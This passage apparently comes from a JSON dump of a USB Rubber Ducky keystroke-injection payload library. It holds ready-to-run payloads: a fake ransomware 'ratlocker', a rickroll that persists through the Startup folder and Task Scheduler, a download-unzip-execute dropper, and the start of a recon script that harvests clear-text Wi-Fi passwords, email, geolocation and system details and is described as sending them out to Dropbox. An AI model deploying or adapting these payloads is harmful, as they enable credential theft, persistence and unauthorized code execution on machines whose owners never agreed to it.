URL, e.g. [pastebin.com/raw/\n \n \n \n \n \n\n\n" }, { "path": "payloads/library/prank/placeholder", "content": "" }, { "path": "payloads/library/prank/ratlocker/README.md", "content": "# Ratlocker (.ratl0ck3r)\n\nThis is a prank payload created by ratcode404(.github.io). It's use is to create a fake malware, locking files but keeping settings stored for easy recovering.\n\n```\n ____()()\n / OO\n ~~~~~\\_;m__m._>o\n```\n\nThe ratlocker adds ratcode file extensions, draws and sets background without the use of URLs or image download (avoid proxy blocking and detection). The original wallpaper will be backuped on \\pictures\\wallpaper.ratl0ck3r, so no files will be lost. The current setup only targets the files and folder structures on $HOME\\Desktop\\, but it could be easily extended by adjusting the path variable further down.\n\n![message](https://i.imgur.com/KYMRr9f.png) \n \n![fakelock](https://i.imgur.com/MBIQdDR.png)\n\n## Why ratl0ck3r\nThere are multiple reasons why ratl0ck3r is the best ducky-locker around to this date:\n\n* Requires no internet connection or proxy by-pass: Pictures are not downloaded or added to the stick in weird, wonky ways but rather drawn with commandline itself. All it needs is pre-installed Windows tools.\n* Easy recovering: All files (inclusive the changed background/wallpaper) are easily recovered in less than a few seconds, no family photo backgrounds will be ever lost; promise!\n* Unbreakable: I have been using this exact setup for weeks to annoy people who do not lock their devices. It has not broken a single time.\n* Runtime: The whole script finishes in less than 7.5 seconds, just plug it in, whistle a nice tune and be gone already.\n\n## Requirements:\n- Windows (7/8/8.1/10)\n- Unlocked device\n- No internet connection or proxy by-pass is needed as the wallpaper will be created in script\n\n## Recovering\nObviously, there is no key or tool needed to recover. All you have to do is to remove the .ratl0ck3r extention before the .original one and everything works again. The background will be stored in \\pictures\\wallpaper.ratl0ck3r to avoid accidential removial of any important backgrounds or family photos!\n\nTo quick-recover you can use this powershell command, but it's much more fun to watch them to it by hand: \n`dir $HOME\\Desktop\\* | Rename-Item -NewName { $_.name.substring(0,$_.name.length-10) }`\n\nThe rat3ncrypt3er.bat does run this command and renames the wallpaper located in \\pictures\\ back to a .jpg, before one could set it as a background once again.\n\n" }, { "path": "payloads/library/prank/ratlocker/payload.txt", "content": "REM Title: Ratlocker\nREM Author:\t Ratcode404(.github.io)\nREM Target: Windows\nREM Description: Adds ratcode file extensions, draws and sets background without the use of URLs or image download (avoid proxy blocking and detection). The original wallpaper will be backuped on \\pictures\\wallpaper.ratl0ck3r, so no files will be lost. The current setup only targets the files and folder structures on $HOME\\Desktop\\, but it could be easily extended by adjusting the path variable further down.\n\nREM Base delay after initiation and ps1 startup\nDELAY 250\nGUI d\nGUI r\nDELAY 100\nSTRING powershell.exe\nENTER\nDELAY 250\n\nREM Backup Wallpaper\nSTRING Copy-Item \"$HOME\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper\" -Destination $home\\pictures\\wallpaper.ratl0ck3r\nENTER\nDELAY 250\n\nREM Create new wallpaper\nSTRING Add-Type -AssemblyName System.Drawing\nENTER\nSTRING $filename = \"$home\\pictures\\ratl0ck3r.png\"\nENTER\nSTRING $bmp = new-object System.Drawing.Bitmap 1080,720\nENTER\nSTRING $font = new-object System.Drawing.Font Consolas,10\nENTER\nSTRING $brushBg = [System.Drawing.Brushes]::Black\nENTER\nSTRING $brushFg = [System.Drawing.Brushes]::Green\nENTER\nSTRING $graphics = [System.Drawing.Graphics]::FromImage($bmp)\nENTER\nSTRING $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)\nENTER\nSTRING $graphics.DrawString('Your device has been encrypted by ratlocker.\nENTER\nENTER\nSTRING ____()()\nENTER\nSTRING / OO\nENTER\nSTRING ~~~~~\\_;m__m._>o\nENTER\nENTER\nENTER\nSTRING Oops! Your files have been encrypted.ENTER\nENTER\nSTRING If you see this text, your files are no longer accessible. You might\nENTER\nSTRING have been looking for a way to recover your files, but do not waste\nENTER\nSTRING your time. No one will be able to recover them without a decrytion\nENTER\nSTRING service.\nENTER\nENTER\nSTRING We gurantee that you can recover all your files safely. All you need\nENTER\nSTRING to do is get the decryption password.\nENTER\nENTER\nSTRING Visit out web services at: fakerat404linkszt3xaxqzf2nm12.onion\nENTER\nENTER\nSTRING Your personal installation key #1:\nENTER\nENTER\nSTRING b0d549572a40f93aa57400dbe43ee72a5e545f47765ef5fb7d17c7e83001cb3d',$font,$brushFg,10,10)\nENTER\nSTRING $graphics.Dispose()\nENTER\nSTRING $bmp.Save($filename)\nENTER\nDELAY 500\n\nREM Set new wallpaper\nSTRING $MyWallpaper=\"$home\\pictures\\ratl0ck3r.png\"\nENTER\nSTRING $code = @'\nENTER\nSTRING using System.Runtime.InteropServices;\nENTER\nSTRING namespace Win32{\nENTER\nSTRING public class Wallpaper{\nENTER\nSTRING [DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\nENTER\nSTRING static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;\nENTER\nSTRING public static void SetWallpaper(string thePath){\nENTER\nSTRING SystemParametersInfo(20,0,thePath,3);\nENTER\nSTRING }\nENTER\nSTRING }\nENTER\nSTRING } \nENTER\nSTRING '@\nENTER\nSTRING add-type $code \nENTER\nSTRING [Win32.Wallpaper]::SetWallpaper($MyWallpaper)\nENTER\nDELAY 500\n\nREM Add ratl0ck3r extension\nSTRING dir $HOME\\Desktop\\* | Rename-Item -NewName {$_.name + \".ratl0ck3r\"}\nENTER\n" }, { "path": "payloads/library/prank/ratlocker/rat3ncrypt3r.bat", "content": "dir $HOME\\Desktop\\* | Rename-Item -NewName { $_.name.substring(0,$_.name.length-10) }\ndir $HOME\\pictures\\wallpaper.ratl0ck3r | Rename-Item -NewName { $_.name.substring(0,$_.name.length-10) }\ndir $HOME\\pictures\\wallpaper | Rename-Item -NewName {$_.name - \".jpg\"}\n" }, { "path": "payloads/library/prank/rickroll/payload.txt", "content": "REM Rick Roll by Thomas McNeela\nREM https://github.com/tommym89/Rubber-Ducky_RickRoll\nDELAY 8000\nGUI r\nDELAY 200\nSTRING cmd\nENTER\nDELAY 200\nREM create folder to hold payloads\nSTRING mkdir \"%USERPROFILE%\\Music\\tmp\"\nENTER\nREM write download script\nSTRING cd %tmp% && copy con dlrick.vbs\nENTER\nREM get user home directory\nENTER\nSTRING Dim oShell: Set oShell = CreateObject(\"WScript.Shell\")\nENTER\nSTRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings(\"%USERPROFILE%\")\nENTER\nREM initialize HTTP objects\nENTER\nSTRING Dim xHttp: Set xHttp = CreateObject(\"Microsoft.XMLHTTP\")\nENTER\nSTRING Dim bStrm: Set bStrm = CreateObject(\"Adodb.Stream\")\nENTER\nREM open mp3 stream\nSTRING xHttp.Open \"GET\", \"https://qoret.com/dl/uploads/2019/07/Rick_Astley_-_Never_Gonna_Give_You_Up_Qoret.com.mp3\", False\nENTER\nSTRING xHttp.Send\nENTER\nREM download and write to file\nSTRING With bStrm\nENTER\nSTRING .type = 1\nENTER\nSTRING .open\nENTER\nSTRING .write xHttp.responseBody\nENTER\nSTRING .saveToFile PRFL + \"\\Music\\tmp\\rick.mp3\", 2\nENTER\nSTRING End With\nENTER\nDELAY 100\nCTRL Z\nENTER\nSTRING copy con dlnir.vbs\nENTER\nREM get user home directory\nENTER\nSTRING Dim oShell: Set oShell = CreateObject(\"WScript.Shell\")\nENTER\nSTRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings(\"%USERPROFILE%\")\nENTER\nREM initialize HTTP objects\nENTER\nSTRING Dim xHttp: Set xHttp = CreateObject(\"Microsoft.XMLHTTP\")\nENTER\nSTRING Dim bStrm: Set bStrm = CreateObject(\"Adodb.Stream\")\nENTER\nREM open mp3 stream\nSTRING xHttp.Open \"GET\", \"http://www.nirsoft.net/utils/nircmd-x64.zip\", False\nENTER\nSTRING xHttp.Send\nENTER\nREM download and write to file\nSTRING With bStrm\nENTER\nSTRING .type = 1\nENTER\nSTRING .open\nENTER\nSTRING .write xHttp.responseBody\nENTER\nSTRING .saveToFile PRFL + \"\\Music\\tmp\\nircmd-x64.zip\", 2\nENTER\nSTRING End With\nENTER\nDELAY 100\nCTRL Z\nENTER\nREM download mp3 and nircmd\nSTRING wscript dlnir.vbs && wscript dlrick.vbs\nENTER\nDELAY 7000\nREM extract nircmd\nSTRING powershell.exe -nologo -noprofile -command \"& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\\Music\\tmp\\nircmd-x64.zip', '%USERPROFILE%\\Music\\tmp'); }\"\nENTER\nDELAY 750\nREM write volume up payload\nSTRING copy con volup.bat\nENTER\nSTRING :loop\nENTER\nSTRING %USERPROFILE%\\Music\\tmp\\nircmd.exe mutesysvolume 0\nENTER\nSTRING %USERPROFILE%\\Music\\tmp\\nircmd.exe setsysvolume 65535\nENTER\nSTRING timeout /t 5\nENTER\nSTRING goto loop\nENTER\nDELAY 100\nCTRL z\nENTER\nSTRING move volup.bat %USERPROFILE%\\Music\\tmp\\volup.bat\nENTER\nREM hide payload folder\nSTRING copy con hidefiles.vbs\nENTER\nSTRING Dim oShell: Set oShell = CreateObject(\"WScript.Shell\")\nENTER\nSTRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings(\"%USERPROFILE%\")\nENTER\nSTRING Dim oFSo: Set oFSo = CreateObject(\"Scripting.FileSystemObject\")\nENTER\nSTRING Dim tmpDir: Set tmpDir = oFSo.GetFolder(PRFL + \"\\Music\\tmp\")\nENTER\nSTRING tmpDir.attributes = tmpDir.attributes + 2\nENTER\nDELAY 100\nCTRL z\nENTER\nSTRING wscript hidefiles.vbs\nENTER\nREM write WMP payload\nSTRING copy con rickyou.vbs\nENTER\nREM get user profile directory\nSTRING Dim oShell: Set oShell = CreateObject(\"WScript.Shell\")\nENTER\nSTRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings(\"%USERPROFILE%\")\nENTER\nREM start playing on loop\nSTRING While true\nENTER\nSTRING Dim oPlayer: Set oPlayer = CreateObject(\"WMPlayer.OCX\")\nENTER\nSTRING oPlayer.URL = PRFL + \"\\Music\\tmp\\rick.mp3\"\nENTER\nSTRING oPlayer.controls.play\nENTER\nSTRING While oPlayer.playState <> 1 ' 1 = Stopped\nENTER\nSTRING WScript.Sleep 100\nENTER\nSTRING Wend\nENTER\nSTRING oPlayer.close\nENTER\nSTRING Wend\nENTER\nDELAY 100\nCTRL z\nENTER\nREM write vbs payload to hide cmd window for volup.bat\nSTRING copy con volup.vbs\nENTER\nSTRING CreateObject(\"WScript.Shell\").Run \"%USERPROFILE%\\Music\\tmp\\volup.bat\", 0, False\nENTER\nDELAY 100\nCTRL z\nENTER\nREM move payloads to startup directory\nSTRING copy rickyou.vbs \"%USERPROFILE%\\Music\\tmp\\rickyou.vbs\"\nENTER\nSTRING move rickyou.vbs \"%SystemDrive%\\Users\\%UserName%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\rickyou.vbs\"\nENTER\nSTRING copy volup.vbs \"%USERPROFILE%\\Music\\tmp\\volup.vbs\"\nENTER\nSTRING move volup.vbs \"%SystemDrive%\\Users\\%UserName%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\volup.vbs\"\nENTER\nREM cleanup\nSTRING del dlrick.vbs\nENTER\nSTRING del dlnir.vbs\nENTER\nSTRING del hidefiles.vbs\nENTER\nSTRING del %USERPROFILE%\\Music\\tmp\\NirCmd.chm\nENTER\nSTRING del %USERPROFILE%\\Music\\tmp\\nircmdc.exe\nENTER\nSTRING del %USERPROFILE%\\Music\\tmp\\nircmd-x64.zip\nENTER\nSTRING exit\nENTER\nREM add to task scheduler to run after unlocking workstation\nDELAY 250\nGUI r\nDELAY 250\nSTRING taskschd.msc\nENTER\nDELAY 2000\nALT a\nSTRING b\nDELAY 1000\nSTRING rr\nENTER\nUP\nENTER\nSTRING s\nTAB\nTAB\nSTRING 4801\nENTER\nENTER\nSTRING wscript\nTAB\nTAB\nSTRING %USERPROFILE%\\Music\\tmp\\rickyou.vbs\nENTER\nENTER\nDELAY 500\nALT a\nSTRING b\nDELAY 1000\nSTRING vu\nENTER\nUP\nENTER\nSTRING s\nTAB\nTAB\nSTRING 4801\nENTER\nENTER\nSTRING wscript\nTAB\nTAB\nSTRING %USERPROFILE%\\Music\\tmp\\volup.vbs\nENTER\nENTER\nDELAY 500\nALT f\nSTRING x\n" }, { "path": "payloads/library/prank/silent_rickroll/README.md", "content": "# Silent Roll\n***\n\nThis script does the following actions respectively\n\n+ Raises volume to maximum\n+ Creates Batch file\n+ Runs Batch file\n***\n\n## Description\nThe script was thought in a way that the payload could be executed in machines that have some level of protection and wont allow the user to open Run Dialog or CMD straight away\n\nSetting the volume to maximum is used with keystroke injection.\n\nThe Batch file created (see bellow) executes itself on a minimized window by default, the first delay specifies how long the batch file will take to execute the rest of the code.\nFollowing the first line of code which starts playing \"Never Gonna Give You Up\" using whichever default browser the user has, there is another delay simply to allow that the video will play automatically before another window is open.\nThe last line of code opens powershell and executes commands to open Microsoft Edge, since it is a browser that is always present on Windows and would help in preventing the user to end the rickroll easily.\nEdge will open a page which leads to a windows fake update page, which will also be set to full screen using powershell commands.\n\n```console\nif not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start \"\" /min \"%~dpnx0\" %* && exit\nTIMEOUT /T 10\nSTART \"\" https://www.youtube.com/watch?v=xm3YgoEiEDc\nTIMEOUT /T 3\nPowershell -command \"$wshell = New-Object -ComObject wscript.shell;[system.Diagnostics.Process]::Start(\\\"msedge\\\",\\\"about:blank\\\");Sleep 1;$wshell.SendKeys('^\"{l}\"');Sleep 1;$wshell.SendKeys('https://fakeupdate.net/win10ue/');$wshell.SendKeys('\"{Enter}\"');$wshell.SendKeys('\"{F11}\"')\"\nexit\n```\n\nThe rest of the script then saves the Batch file to the Documents folder, away from a user's immediate view. Sadly this part of the script encountered problems using the REPEAT function in which \"TAB REPEAT 8\" did not work as intended and the script always got stuck to File Explorer's search bar, never being able to select the folder and save the file properly so \"REPEAT\" had to be removed in this instance\n\nThe batch file's name is then searched and executed, the delay can give the attacker enough time to remove the device from the machine and be far away before it executes\n\n***\n[Ducktoolkit][1] utilized to encode scripts\n\n### [Hak5 Ducky script references][2]\n\n[1]: https://ducktoolkit.com/encode\n[2]: https://docs.hak5.org/usb-rubber-ducky-1/the-ducky-script-language/ducky-script-quick-reference\n" }, { "path": "payloads/library/prank/silent_rickroll/payload.txt", "content": "REM Author: victor-a-c\nREM Title: silent_rickroll\nREM Target: Windows10/11\nREM Props: Hak5\nREM Version: 2.0\nREM Category: Prank\n\nREM Description:\nREM the payload sets volume to maximum\nREM creates batch file with delay which will run while the prompt window is minimized\nREM after the first delay ends Never Gonna Give You Up starts playing on default browser\nREM a few seconds later it opens edge (present in all windows computers) and opens fake windows update on full screen\nREM \"GUI SPACE\" works for computers with locked prompts, which allows for program search\nREM \"GUI r\" should be used for regular computers\n\nREM set volume to max as fast as possible\nDELAY 2000\nGUI\nDELAY 500\nSTRING adjust volume\nDELAY 100\nENTER\nDELAY 1000\nTAB\nREPEAT 10\nDELAY 1000\nRIGHTARROW\nREPEAT 120\nDELAY 100\nALT F4\n\nDELAY 1500\nREM creates batch file\nGUI\nDELAY 100\nSPACE\nDELAY 1000\nSTRING notepad\nDELAY 500\nENTER\nDELAY 1000\nREM batch file commands\nREM uses just \"start\" batch command to open website on default browser\nREM double quotes after \"start\" are necessary for the command to work\nREM Batch file will run while minimized\nSTRING if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start \"\" /min \"%~dpnx0\" %* && exit\nDELAY 100\nENTER\nREM batch delay for when \"Never Gonna Give You Up\" will start being played\nREM enough time for the ducky to be removed after the script is executed and allow for a safe getaway\nSTRING TIMEOUT /T 30\nDELAY 500\nENTER\nREM on default browser\nSTRING START \"\" https://www.youtube.com/watch?v=xm3YgoEiEDc\nDELAY 10\nENTER\nSTRING TIMEOUT /T 3\nENTER\nDELAY 500\nREM Opens microsoft edge, opens fake windows update and sets it full screen\nSTRING Powershell -command \"$wshell = New-Object -ComObject wscript.shell;[system.Diagnostics.Process]::Start(\\\"msedge\\\",\\\"about:blank\\\");Sleep 1;$wshell.SendKeys('^\"{l}\"');Sleep 1;$wshell.SendKeys('https://fakeupdate.net/win10ue/');$wshell.SendKeys('\"{Enter}\"');$wshell.SendKeys('\"{F11}\"')\"\nENTER\nSTRING exit\nDELAY 1000\nREM save as\nALT F\nDOWNARROW\nREPEAT 3\nDELAY 100\nENTER\nSTRING sr.bat\nDELAY 500\nTAB\nDELAY 100\nDOWNARROW\nREPEAT 1\nENTER\nREM\nREM unfortunately \"TAB REPEAT 9\" causes the script to get stuck to file explorer's search bar\nREM splitting the repeat and adding delays between them did not solve it\nREM\nTAB\nDELAY 150\nTAB\nDELAY 150\nTAB\nDELAY 150\nTAB\nDELAY 150\nTAB\nDELAY 150\nTAB\nDELAY 150\nTAB\nDELAY 150\nTAB\nDELAY 150\nTAB\nREM selects documents folder\nDELAY 200\nSTRING doc\nENTER\nDELAY 1000\nALT F4\n\n\nDELAY 500\nREM execute the batch file\nGUI\nDELAY 500\nSPACE\nSTRING sr.b\nDELAY 500\nSTRING at\nDELAY 1000\nENTER\n" }, { "path": "payloads/library/prank/the_f_bomb/payload.txt", "content": "REM Title: the_f_bomb\nREM Author: @tjgeirk\nREM Description: The littlest payload known to duck-kind\nREM it's f_ing hilarious - works on all windows machines with powershell\nDELAY 300\nGUI r\nDELAY 100\nSTRING powershell while(1){ii **}\nENTER\n" }, { "path": "payloads/library/prank/windows_repair/payload.txt", "content": "REM Title: Windows Repair\nREM Author: yadhumanikandan\nREM Description: code will open a bowser and show the windows breakdown image in full screen mode\n\nDELAY 1000\nGUI r\nDELAY 500\nSTRING https://upload.wikimedia.org/wikipedia/commons/5/56/Bsodwindows10.png\nENTER\nDELAY 1000\nF11\nDELAY 500\n" }, { "path": "payloads/library/recon/Drop_Zip_Execute/payload.txt", "content": "REM Name: DROP-ZIP-EXCECUTE\nREM Author: Lumen\nREM Description: Downloads program in a zip file, then unzips and executes it\nREM Target: Windows 10 powershell\nDELAY 1000\nGUI r\nDELAY 300\nSTRING powershell\nDELAY 300\nENTER\nDELAY 600\nSTRING Invoke-WebRequest -Uri -OutFile \"~\\Documents\\My Games\\file.zip\"; Expand-Archive -Path \"~\\Documents\\My Games\\file.zip\" -DestinationPath \"~\\Documents\\My Games\\file\"; Remove-Item \"~\\Documents\\My Games\\file.zip\"; & ''\nENTER\nREM Invoke-WebRequest gets and saves the content of the URI given to it\nREM Pasting a dropbox link works well here. Just get the share link and change ?dl=0 to ?dl=1\nREM Expand-Archive Unzips path to destinationPath\nREM Remove-Item deletes the zip file (just to clean up a bit)\nREM & tells powershell to execute the given path\nREM since powershelgl opens at C:\\Users\\%user%, a relative path can be used from there\nREM using %user% seems to set off a red flag in powershell, but relative paths work well\nREM ; allows multiple commands to be run one after the other, so rather than running one and \nREM guessing a wait time, the command is entered and ran all at once.\nREM once the command is typed and the download begins, the ducky can be removed and the\nREM computer will take care of the rest through the given instructions\nREM Best when combined with a well made BATCH file to shift files around, make multiple copies,\nREM shortcuts, and move them into startup folders ;)\n" }, { "path": "payloads/library/recon/Tree_of_Knowledge/-RD-ADV-Recon/ADV-Recon.ps1", "content": "############################################################################################################################################################ \r\n# | ___ _ _ _ # ,d88b.d88b # \r\n# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \r\n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \r\n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\r\n# Category : Recon | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\r\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \r\n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \r\n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \r\n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \r\n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \r\n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\r\n# # / \\ / ~ \\ #\r\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \r\n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \r\n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \r\n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\r\n############################################################################################################################################################\r\n \r\n<#\r\n\r\n.SYNOPSIS\r\n\tThis is an advanced recon of a target PC and exfiltration of that data\r\n\r\n.DESCRIPTION \r\n\tThis program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running\r\n\tAll of the gather information is formatted neatly and output to a file \r\n\tThat file is then exfiltrated to cloud storage via DropBox\r\n\r\n.Link\r\n\thttps://developers.dropbox.com/oauth-guide\t\t# Guide for setting up your DropBox for uploads\r\n#>\r\n\r\n############################################################################################################################################################\r\n\r\n$DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"\r\n\r\n############################################################################################################################################################\r\n\r\n function Get-fullName {\r\n\r\n try {\r\n\r\n $fullName = Net User $Env:username | Select-String -Pattern \"Full Name\";$fullName = (\"$fullName\").TrimStart(\"Full Name\")\r\n\r\n }\r\n \r\n # If no name is detected function will return $env:UserName \r\n\r\n # Write Error is just for troubleshooting \r\n catch {Write-Error \"No name was detected\" \r\n return $env:UserName\r\n -ErrorAction SilentlyContinue\r\n }\r\n\r\n return $fullName \r\n\r\n}\r\n\r\n$FN = Get-fullName\r\n\r\n#------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nfunction Get-email {\r\n \r\n try {\r\n\r\n $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern \"([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})\" -AllMatches;$email = (\"$email\").Trim()\r\n\treturn $email\r\n }\r\n\r\n# If no email is detected function will return backup message for sapi speak\r\n\r\n # Write Error is just for troubleshooting\r\n catch {Write-Error \"An email was not found\" \r\n return \"No Email Detected\"\r\n -ErrorAction SilentlyContinue\r\n } \r\n}\r\n\r\n$EM = Get-email\r\n\r\n#------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nfunction Get-GeoLocation{\r\n\ttry {\r\n\tAdd-Type -AssemblyName System.Device #Required to access System.Device.Location namespace\r\n\t$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object\r\n\t$GeoWatcher.Start() #Begin resolving current locaton\r\n\r\n\twhile (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {\r\n\t\tStart-Sleep -Milliseconds 100 #Wait for discovery.\r\n\t} \r\n\r\n\tif ($GeoWatcher.Permission -eq 'Denied'){\r\n\t\tWrite-Error 'Access Denied for Location Information'\r\n\t} else {\r\n\t\t$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.\r\n\t}\r\n\t}\r\n # Write Error is just for troubleshooting\r\n catch {Write-Error \"No coordinates found\" \r\n return \"No Coordinates found\"\r\n -ErrorAction SilentlyContinue\r\n } \r\n\r\n}\r\n\r\n$GL = Get-GeoLocation\r\n\r\n############################################################################################################################################################\r\n\r\n# Get nearby wifi networks\r\n\r\ntry\r\n{\r\n$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like \"SSID*\" -or $_ -like \"*Authentication*\" -or $_ -like \"*Encryption*\"}).trim()\r\n}\r\ncatch\r\n{\r\n$NearbyWifi=\"No nearby wifi networks detected\"\r\n}\r\n\r\n############################################################################################################################################################\r\n\r\n# Get info about pc\r\n\r\n# Get IP / Network Info\r\ntry\r\n{\r\n$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content\r\n}\r\ncatch\r\n{\r\n$computerPubIP=\"Error getting Public IP\"\r\n}\r\n\r\n$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}\r\n\r\n############################################################################################################################################################\r\n\r\n$IsDHCPEnabled = $false\r\n$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"DHCPEnabled=$True\" | ? {$_.IPEnabled}\r\nforeach ($Network in $Networks) {\r\nIf($network.DHCPEnabled) {\r\n$IsDHCPEnabled = $true\r\n }\r\n$MAC = ipconfig /all | Select-String -Pattern \"physical\" | select-object -First 1; $MAC = [string]$MAC; $MAC = $MAC.Substring($MAC.Length - 17)\r\n}\r\n\r\n############################################################################################################################################################\r\n\r\n#Get System Info\r\n$computerSystem = Get-CimInstance CIM_ComputerSystem\r\n$computerBIOS = Get-CimInstance CIM_BIOSElement\r\n\r\n$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name=\"InstallDate\";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name=\"LastBootUpTime\";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name=\"LocalDateTime\";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List\r\n$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List\r\n$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List\r\n\r\n$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { \"{0:N1} GB\" -f ($_.sum / 1GB)}\r\n$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name=\"Capacity\";Expression={ \"{0:N1} GB\" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table\r\n\r\n############################################################################################################################################################\r\n\r\n# Get HDDs\r\n$driveType = @{\r\n 2=\"Removable disk \"\r\n 3=\"Fixed local disk \"\r\n 4=\"Network disk \"\r\n 5=\"Compact disk \"}\r\n$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name=\"DriveType\";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name=\"Size_GB\";Expression={\"{0:N1} GB\" -f ($_.Size / 1Gb)}}, @{Name=\"FreeSpace_GB\";Expression={\"{0:N1} GB\" -f ($_.FreeSpace / 1Gb)}}, @{Name=\"FreeSpace_percent\";Expression={\"{0:N1}%\" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name=\"Size GB\"; Expression={$_.Size_GB}; align=\"right\"; }, @{ Name=\"FreeSpace GB\"; Expression={$_.FreeSpace_GB}; align=\"right\"; }, @{ Name=\"FreeSpace %\"; Expression={$_.FreeSpace_percent}; align=\"right\"; }\r\n\r\n#Get - Com & Serial Devices\r\n$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table\r\n\r\n# Check RDP\r\n$RDP\r\nif ((Get-ItemProperty \"hklm:\\System\\CurrentControlSet\\Control\\Terminal Server\").fDenyTSConnections -eq 0) { \r\n\t$RDP = \"RDP is Enabled\" \r\n} else {\r\n\t$RDP = \"RDP is NOT enabled\" \r\n}\r\n\r\n############################################################################################################################################################\r\n\r\n# Get Network Interfaces\r\n$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress \r\n\r\n# Get wifi SSIDs and Passwords\t\r\n$WLANProfileNames =@()\r\n#Get all the WLAN profile names\r\n$Output = netsh.exe wlan show profiles | Select-String -pattern \" : \"\r\n#Trim the output to receive only the name\r\nForeach($WLANProfileName in $Output){\r\n $WLANProfileNames += (($WLANProfileName -split \":\")[1]).Trim()\r\n}\r\n$WLANProfileObjects =@()\r\n#Bind the WLAN profile names and also the password to a custom object\r\nForeach($WLANProfileName in $WLANProfileNames){\r\n #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user\r\n try{\r\n $WLANProfilePassword = (((netsh.exe wlan show profiles name=\"$WLANProfileName\" key=clear | select-string -Pattern \"Key Content\") -split \":\")[1]).Trim()\r\n }Catch{\r\n $WLANProfilePassword = \"The password is not stored in this profile\"\r\n }\r\n #Build the object and add this to an array\r\n $WLANProfileObject = New-Object PSCustomobject \r\n $WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfileName\" -Value $WLANProfileName\r\n $WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfilePassword\" -Value $WLANProfilePassword\r\n $WLANProfileObjects += $WLANProfileObject\r\n Remove-Variable WLANProfileObject\r\n}\r\n\r\n############################################################################################################################################################\r\n\r\n# local-user\r\n$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID\r\n\r\n# process first\r\n$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine\r\n\r\n# Get Listeners / ActiveTcpConnections\r\n$listener = Get-NetTCPConnection | select @{Name=\"LocalAddress\";Expression={$_.LocalAddress + \":\" + $_.LocalPort}}, @{Name=\"RemoteAddress\";Expression={$_.RemoteAddress + \":\" 